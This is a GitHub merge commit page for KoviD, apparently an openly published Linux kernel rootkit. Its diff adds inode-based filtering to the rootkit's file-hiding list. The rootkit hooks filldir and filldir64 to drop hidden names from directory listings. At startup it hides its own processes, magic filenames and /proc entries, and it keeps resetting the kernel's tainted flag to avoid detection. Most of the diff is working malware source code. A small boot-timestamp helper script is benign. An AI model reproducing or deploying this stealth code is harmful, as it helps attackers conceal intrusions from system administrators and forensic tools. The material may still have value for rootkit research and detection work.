Merge pull request #108 from carloslack/kvdev

Kvdev
carloslack · Sep 30, 2024 · aa88647 · aa88647
2 parents 709f8a6 + cdc4e60
commit aa88647
Show file tree

Hide file tree

Showing 7 changed files with 74 additions and 28 deletions.
diff --git a/README.md b/README.md
@@ -139,9 +139,9 @@ Read [Phrack magazine](http://phrack.org/issues/71/12.html#article) where g1inko
 
 ### 2.14 Tainted
 
-   $ sudo insmod ./kovid.ko
-   $ cat /proc/sys/kernel/tainted
-   0
+    $ sudo insmod ./kovid.ko
+    $ cat /proc/sys/kernel/tainted
+    0
 
 ## 3 - Usage
 

diff --git a/scripts/boottime.sh b/scripts/boottime.sh
@@ -0,0 +1,21 @@
+#!/bin/bash
+set -eou pipefail
+# Calculates syslog (and similar) boot timestamp
+#
+# Usage e.g.:
+#	$ ./timestamp.sh 364.010543
+#	00:06:04.010543
+
+timestamp="$1"
+
+# Split the timestamp into seconds and microseconds
+seconds=$(echo $timestamp | cut -d. -f1)
+microseconds=$(echo $timestamp | cut -d. -f2)
+
+# Calculate hours, minutes, and remaining seconds
+hours=$((seconds / 3600))
+minutes=$(((seconds % 3600) / 60))
+remaining_seconds=$((seconds % 60))
+
+# Print in HH:MM:SS.microseconds format
+printf "%02d:%02d:%02d.%s\n" $hours $minutes $remaining_seconds $microseconds
diff --git a/src/fs.c b/src/fs.c
@@ -129,18 +129,24 @@ struct fs_file_node* fs_get_file_node(const struct task_struct *task) {
 
 static LIST_HEAD(names_node);
 struct hidden_names {
+    u64 ino;
     char *name;
-    bool ro;
     struct list_head list;
+    bool ro;
 };
 
-bool fs_search_name(const char *name) {
+bool fs_search_name(const char *name, u64 ino) {
     struct hidden_names *node, *node_safe;
     list_for_each_entry_safe(node, node_safe, &names_node, list) {
+
         /** This will match any string starting with pattern */
-        if (!strncmp(node->name, name, strlen(node->name)))
-            return true;
+        if (!strncmp(node->name, name, strlen(node->name))) {
+            /** and this will filter by inode number, if set. */
+            if (0 == node->ino || ino == node->ino)
+                return true; /** found match */
+        }
     }
+    /** not found */
     return false;
 }
 
@@ -151,7 +157,7 @@ void fs_list_names(void) {
     }
 }
 
-static int _fs_add_name(const char *names[], bool ro) {
+static int _fs_add_name(const char *names[], bool ro, u64 ino) {
     const char **s;
 
     if (!names)
@@ -162,7 +168,7 @@ static int _fs_add_name(const char *names[], bool ro) {
         if (!len)
             continue;
 
-        if (!fs_search_name(*s)) {
+        if (!fs_search_name(*s, ino)) {
             struct hidden_names *hn = kcalloc(1, sizeof(struct hidden_names) , GFP_KERNEL);
             if (!hn)
                 return -ENOMEM;
@@ -171,6 +177,7 @@ static int _fs_add_name(const char *names[], bool ro) {
             hn->name = kcalloc(1, len+1, GFP_KERNEL);
             strncpy(hn->name, (const char*)*s, len);
             hn->ro = ro;
+            hn->ino = ino;
             list_add_tail(&hn->list, &names_node);
         }
     }
@@ -180,12 +187,12 @@ static int _fs_add_name(const char *names[], bool ro) {
     return -EINVAL;
 }
 
-int fs_add_name_ro(const char *names[]) {
-    return _fs_add_name(names, true);
+int fs_add_name_ro(const char *names[], u64 ino) {
+    return _fs_add_name(names, true, ino);
 }
 
-int fs_add_name_rw(const char *names[]) {
-    return _fs_add_name(names, false);
+int fs_add_name_rw(const char *names[], u64 ino) {
+    return _fs_add_name(names, false, ino);
 }
 
 bool fs_del_name(const char *names[]) {

diff --git a/src/fs.h b/src/fs.h
@@ -22,10 +22,10 @@ int fs_file_stat(const char *name, struct kstat *stat);
  */
 struct fs_file_node *fs_get_file_node(const struct task_struct *task);
 
-bool fs_search_name(const char *name);
+bool fs_search_name(const char *name, u64);
 void fs_list_names(void);
-int fs_add_name_ro(const char **);
-int fs_add_name_rw(const char **);
+int fs_add_name_ro(const char **, u64);
+int fs_add_name_rw(const char **, u64);
 bool fs_del_name(const char **);
 void fs_names_cleanup(void);
 struct fs_file_node *fs_load_fnode(struct file *f);

diff --git a/src/kovid.c b/src/kovid.c
@@ -490,14 +490,32 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
             /* list hidden tasks */
         } else if(!strcmp(buf, "-s")) {
             kv_show_saved_tasks();
-            /* add name to the list of hidden files/directories */
+            /* add name to the list of hidden files/directories
+             * and inode, is present.
+             * */
         } else if(!strncmp(buf, "-a", MIN(2, size))) {
+            int ino = 0;
             char *s = &buf[3];
-            s[strcspn(s, " ")] = 0;
-            if (strlen(s)) {
-                const char *tmp[] = {s,NULL};
-                fs_add_name_rw(tmp);
+            char *number_str;
+            const char *tmp[] = {NULL, NULL};
+            int ok = 1;
+
+            s[strcspn(s, "\n")] = 0;
+
+            // Find the first space in the input to separate name and number
+            number_str = strchr(s, ' ');
+            if (number_str) {
+                *number_str++ = '\0';
+            } else {
+                number_str = "";
             }
+
+            *tmp = s;
+            if (*number_str)
+                ok = !kstrtoint(number_str, 10, &ino);
+
+            if (ok)
+                fs_add_name_rw(tmp, ino);
             /* unhide file/directory */
         } else if(!strncmp(buf, "-d", MIN(2, size))) {
             char *s = &buf[3];
@@ -744,7 +762,7 @@ static int __init kv_init(void) {
     if (!tsk_prc)
         goto unroll_init;
 
-    fs_add_name_ro(hideprocname);
+    fs_add_name_ro(hideprocname, 0);
 
     tsk_tainted = kthread_run(_reset_tainted, NULL, THREAD_TAINTED_NAME);
     if (!tsk_tainted)
@@ -767,10 +785,10 @@ static int __init kv_init(void) {
     kv_hide_task_by_pid(tsk_tainted->pid, 0, CHILDREN);
 
     /** hide magic filenames & directories */
-    fs_add_name_ro(kv_hide_str_on_load);
+    fs_add_name_ro(kv_hide_str_on_load, 0);
 
     /** hide magic filenames, directories and processes */
-    fs_add_name_ro(kv_get_hide_ps_names());
+    fs_add_name_ro(kv_get_hide_ps_names(), 0);
 
     kv_scan_and_hide();
 

diff --git a/src/pid.c b/src/pid.c
@@ -79,7 +79,7 @@ static int _hide_task(void *data) {
     /** hide /proc/<pid> */
     snprintf(pidnum, sizeof(pidnum), "%d",  node->task->pid);
     pidstr[0] = pidnum;
-    fs_add_name_rw(pidstr);
+    fs_add_name_rw(pidstr, 0);
 
     prinfo("hide [%p] %s : %d\n", ht->task, ht->task->comm, ht->task->pid);
 

diff --git a/src/sys.c b/src/sys.c
@@ -577,15 +577,15 @@ static struct audit_buffer *m_audit_log_start(struct audit_context *ctx,
 static int  (*real_filldir)(struct dir_context *, const char *, int, loff_t, u64, unsigned int);
 static int m_filldir(struct dir_context *ctx, const char *name, int namlen,loff_t offset, u64 ino, unsigned int d_type) {
 
-    if (fs_search_name(name))
+    if (fs_search_name(name, ino))
         return 0;
     return real_filldir(ctx, name, namlen, offset, ino, d_type);
 }
 
 static int  (*real_filldir64)(struct dir_context *, const char *, int, loff_t, u64, unsigned int);
 static int m_filldir64(struct dir_context *ctx, const char *name, int namlen,loff_t offset, u64 ino, unsigned int d_type) {
 
-    if (fs_search_name(name))
+    if (fs_search_name(name, ino))
         return 0;
     return real_filldir64(ctx, name, namlen, offset, ino, d_type);
 }
@@ -1040,7 +1040,7 @@ static char *_sys_file(char *prefix, char *file, int len) {
         snprintf(file, len-1, "/var/%s", s);
         {
             const char *tmp[] = {s,NULL};
-            fs_add_name_ro(tmp);
+            fs_add_name_ro(tmp, 0);
         }
         prinfo("new %s, filename: '%s'\n", prefix, file);
     }